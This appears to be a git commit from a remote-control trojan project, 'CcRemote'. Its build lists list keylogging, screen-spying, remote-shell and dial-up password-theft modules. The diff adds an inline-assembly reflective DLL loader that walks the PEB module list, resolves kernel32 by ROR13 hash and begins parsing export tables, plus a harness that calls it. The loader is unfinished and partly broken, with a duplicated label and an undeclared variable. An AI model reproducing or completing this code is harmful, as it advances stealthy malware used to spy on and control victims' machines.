PEB汇编

This commit is contained in:
changcheng 2020-09-21 20:40:40 +08:00
parent d1c3b70e8f
commit d2afef0ac1
12 changed files with 257 additions and 54 deletions

Binary file not shown.

View File

@ -1,28 +1,28 @@
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\pch.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audio.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\until.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\buffer.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videocap.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\manager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\install.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\strcry.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog

View File

@ -8,14 +8,17 @@ g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决
g:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(50): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(224): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(229): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(252): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(421): warning C4102: “loc_46327B”: 未引用的标签
LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”已忽略
正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
正在生成代码
1 of 375 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
1 of 380 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
0 functions were new in current compilation
0 functions had inline decision re-evaluated but remain unchanged
已完成代码的生成

View File

@ -6,7 +6,12 @@
#include "common/install.h"
#include <stdio.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi.lib")
#include <iostream>
#include <fstream>
//using namespace std;
struct Connect_Address
@ -231,6 +236,84 @@ extern "C" __declspec(dllexport) void TestFun(char* strHost, int nPort)
FILE * pFile;
long lSize;
char * buffer;
size_t result;
extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
{
// 一个不漏地读入整个文件,只能采用二进制方式打开
pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
if (pFile == NULL)
{
fputs("File error", stderr);
printf("open file fail");
return false;
}
// 获取文件大小
fseek(pFile, 0, SEEK_END);
lSize = ftell(pFile);
rewind(pFile);
// 分配内存存储整个文件
buffer = (char*)malloc(sizeof(char)*lSize);
if (buffer == NULL)
{
fputs("Memory error", stderr);
printf("Memory alloc falil");
return false;
}
// 将文件拷贝到buffer中
result = fread(buffer, 1, lSize, pFile);
if (result != lSize)
{
fputs("Reading error", stderr);
printf("Load file to memory falil");
return false;
}
return true;
}
inline DWORD GetCurrentPositionAddress()
{
_asm{
@ -242,38 +325,60 @@ inline DWORD GetCurrentPositionAddress()
}
}
inline DWORD call_ror_0xD()
{
_asm {
push ebp
mov ebp, esp
mov eax, [ebp + 8]
ror eax, 0x0D
pop ebp
retn
}
}
enum LocalEnum
{
Nop,
memAddress,
pLoadLibraryA,
pGetProcAddress,
pVirtualAlloc,
pVirtualProtect,
pNtFlushInstructionCache,
varLocalFindPE
memAddress = 4,
pLoadLibraryA = 8,
pGetProcAddress = 0xC,
pVirtualAlloc = 0x10,
pVirtualProtect = 0x14,
pNtFlushInstructionCache = 0x18,
varLocalFindPE = 0x1c,
varLocalFS30_A = 0x20, // var_8
varLocalFS30_B = 0x24, // varLocalFS30_B
var_4 = 0x28, // FullDllName
BaseDllName = 0x2c, // FullDllName
name_hash = 0x30,
var_20 = 0x34
};
extern "C" __declspec(dllexport) void ReflectiveLoader()
{
_asm{
push ebp
mov ebp, esp
sub esp, 0x100
sub esp, 0x100 // 抬高堆栈创建局部变量空间
mov eax, 4
initLocalVar:
initLocalVar: // 循环initLocalVar初始化局部变量空间为0
mov [ebp + eax], 0
inc eax
cmp eax ,0x100
jnz initLocalVar
call GetCurrentPositionAddress //获取当前位置地址
mov [ebp + memAddress], eax //保存当前代码所在的地址 memAddress
call GetCurrentPositionAddress // 获取当前位置地址
mov eax, buffer
mov [ebp + memAddress], eax // 保存当前代码所在的地址 memAddress
addressAdd :
mov eax, 1
test eax, eax //判断eax是否获取到当前地址
test eax, eax // 判断eax是否获取到当前地址
jz find_success
mov ecx, [ebp + memAddress] // 查找DOS头
@ -285,27 +390,112 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
mov eax, [ebp + memAddress]
mov ecx, [eax + 0x3C] // +3C 找到DOS Header e_lfanew
mov [ebp + varLocalFindPE], ecx
cmp [ebp + varLocalFindPE], 0x40
cmp dword ptr[ebp + varLocalFindPE], 0x40
jb noFindFlag // 地址address - 1
cmp [ebp + varLocalFindPE], 0x400
jnb noFindFlag //; 地址address - 1
cmp dword ptr[ebp + varLocalFindPE], 0x400
jnb noFindFlag // 地址address - 1
mov edx, [ebp + varLocalFindPE]
add edx, [ebp + memAddress]
mov [ebp + varLocalFindPE], edx
mov eax, [ebp + varLocalFindPE]
cmp dword ptr[eax], 0x4550 //; 判断PE Header Signature PE标志
jnz noFindFlag //; 地址address - 1
cmp dword ptr[eax], 0x4550 // 判断PE Header Signature PE标志
jnz noFindFlag // 地址address - 1
jmp find_success // 找到了singtrue 跳转
noFindFlag :
noFindFlag :
mov ecx, [ebp + memAddress]; address - 1
sub ecx, 1
mov [ebp + memAddress], ecx
jmp addressAdd
find_success:
mov edx, fs:[0x30] // 获取PEB结构地址
mov [ebp + varLocalFS30_A], edx
mov eax, [ebp + varLocalFS30_A]
mov ecx, [eax + 0x0C] // 获取Ptr32 _PEB_LDR_DATA 进程加载模块链表(Ldr)
mov [ebp + varLocalFS30_A], ecx
mov edx, [ebp + varLocalFS30_A]
mov eax, [edx + 0x14] // 获取结构中InMemoryOrderModuleList 顺序模块列表
mov [ebp + varLocalFS30_B], eax
loc_46327B:
cmp [ebp + varLocalFS30_B], 0
jz find_moudle_null
mov ecx, [ebp + varLocalFS30_B]
mov edx, [ecx + 0x28] // FullDllName_buff 模块名称
mov [ebp + BaseDllName], edx
mov eax, [ebp + varLocalFS30_B]
mov cx, [eax + 0x24] // UNICODE_STRING FullDllName Length
mov [ebp + var_4], cx // var_4保存FullDllName字符串长度
mov [ebp + name_hash], 0
calc_hash:
mov edx, [ebp + name_hash]
push edx
call call_ror_0xD
add esp, 4
mov [ebp + name_hash], eax // ror后的eax为返回值
mov eax, [ebp + BaseDllName]
movzx ecx, byte ptr[eax]
cmp ecx, 0x61 // 判断获取到的模块字符串的指定位置,小于跳转,地址 + 1比对下一个字母
jl less_flage
mov edx, [ebp + BaseDllName] // 获取名称byte
movzx eax, byte ptr[edx] // eax = byte
mov ecx, [ebp + name_hash] // 计算值
lea edx, [ecx + eax - 0x20] // hash + FullDllName[index] - 0x20
mov [ebp + name_hash], edx // 得到结果
jmp calc_end
less_flage:
add ecx, [ebp + name_hash]
mov[ebp + name_hash], ecx
calc_end:
mov edx, [ebp + BaseDllName] // 名称地址 + 1
add edx, 1
mov [ebp + BaseDllName], edx
mov ax, [ebp + var_4] // 字符串名称长度 - 1
sub ax, 1
mov [ebp + var_4], ax
movzx ecx, [ebp + var_4]
test ecx, ecx // 判断长度是否为0没有为0继续计算hash
jnz calc_hash // 计算简单的模块名称name_hash
cmp [ebp + name_hash], 0x6A4ABC5B // 6A4ABC5B = Kernel32
jnz no_Kernel32_hash // 3CFA685D = ntdll
mov edx, [ebp + varLocalFS30_B] // 获取结构中InMemoryOrderModuleList
mov eax, [edx + 0x10]
mov [ebp + varLocalFS30_A], eax // +10偏移获取DllBase基址
mov ecx, [ebp + varLocalFS30_A]
mov edx, [ebp + varLocalFS30_A]
add edx, [ecx + 0x3C] // 获取PE IMAGE_DOS_HRADER e_lfanew
mov [ebp + var_20], edx
mov eax, 8
imul ecx, eax, 0 // imul 1, 2, 3 2 3乘积保存到1
mov edx, [ebp + var_20]
lea eax, [edx + ecx + 0x78] // 获取IMAGE_OPTIONAL_HEADER -> IMAGE_DATA_DIRECTORY[0] EXPORT 导出表
mov [ebp + exp_AddressOfNames], eax
mov ecx, [ebp + exp_AddressOfNames]
mov edx, [ebp + varLocalFS30_A] // edx = 基地址
add edx, [ecx] // 基地址 + 导出表地址
mov [ebp + var_20], edx
mov eax, [ebp + var_20]
mov ecx, [ebp + varLocalFS30_A]
add ecx, [eax + 0x20] // 获取 IMAGE_EXPORT_DIRECTORY +0x20 AddressOfNames
mov [ebp + exp_AddressOfNames], ecx
mov edx, [ebp + var_20]
mov eax, [ebp + varLocalFS30_A]
add eax, [edx + 0x24] // 获取 IMAGE_EXPORT_DIRECTORY +0x24 AddressOfNameOrdinals
mov [ebp + AddressOfNameOrdinals], eax
mov ecx, 4
mov [ebp + var_4], cx
find_success:
find_moudle_null:
}

View File

@ -1 +1 @@
f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe

View File

@ -1,6 +1,6 @@
C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
TestLoadDll.cpp
正在生成代码
All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
已完成代码的生成
TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe

View File

@ -1,2 +1,2 @@
#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
Release|Win32|F:\myapp\CcRemote\CcMainDll\|
Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|

View File

@ -11,6 +11,16 @@ int main()
//载入服务端dll hijack test
HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll");
typedef int(_cdecl *TestRunInit)();
TestRunInit InitTestReflectiveLoader = (TestRunInit)GetProcAddress(hServerDll, "InitTestReflectiveLoader");
if (InitTestReflectiveLoader != NULL)
{
InitTestReflectiveLoader(); //调用这个函数
}
//声明导出函数类型--导出的TestRun函数
typedef void(_cdecl *TestRunT)();
//寻找dll中导出函数

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.